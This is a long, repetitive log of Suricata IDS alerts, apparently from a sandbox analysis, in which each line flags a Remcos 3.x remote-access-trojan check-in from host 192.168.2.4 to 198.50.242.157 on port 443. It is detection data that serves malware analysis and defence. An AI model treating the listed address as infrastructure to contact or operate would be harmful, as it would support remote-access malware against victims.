Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50113 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49974 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50071 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50050 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50079 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50153 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49963 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50183 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50115 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50108 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49931 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50122 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49972 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50090 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50168 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50196 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50044 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50155 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50142 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49958 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49921 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50199 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49991 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50202 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50185 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50147 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50114 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50093 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50019 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50081 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49980 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50201 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50203 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50152 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50030 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50151 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50043 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50111 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50026 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50220 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49976 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50187 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50112 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49984 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50039 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50225 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50128 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50176 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50191 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50095 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50116 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49983 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50235 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50148 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50005 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49887 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50160 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50118 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50045 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50173 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50012 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50230 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50219 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50139 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49917 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50212 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50237 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50076 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50056 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50181 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50029 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49816 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50200 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50120 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50211 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50269 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50274 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50273 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50270 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50228 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50150 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50087 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50297 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50166 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50075 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50195 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49940 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50189 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50262 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49851 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50215 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50164 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50251 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50242 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49954 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50263 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50103 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50192 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50110 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50178 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50254 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50319 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50252 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50280 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49981 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50184 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50136 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50304 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50331 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50256 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50285 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50281 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49881 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49995 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50279 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50062 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49912 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50259 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50261 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49932 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50006 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50336 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50255 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49898 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50123 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50348 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50238 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50260 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50125 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50350 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49899 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50239 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50357 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50326 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50059 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50276 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50197 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50216 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50244 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50311 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50041 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50069 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50214 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50207 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50180 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50074 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50154 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50301 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50078 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50284 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50226 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50222 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50101 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50233 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50314 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50092 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50144 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50086 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50096 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50271 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50384 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50289 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50294 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50104 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50267 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50171 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50174 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50296 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50016 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50143 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50324 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50213 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50381 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50327 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50243 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50245 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50217 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49933 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50292 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50383 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50097 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50365 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50286 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50328 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49967 -> 198.50.242.157:443
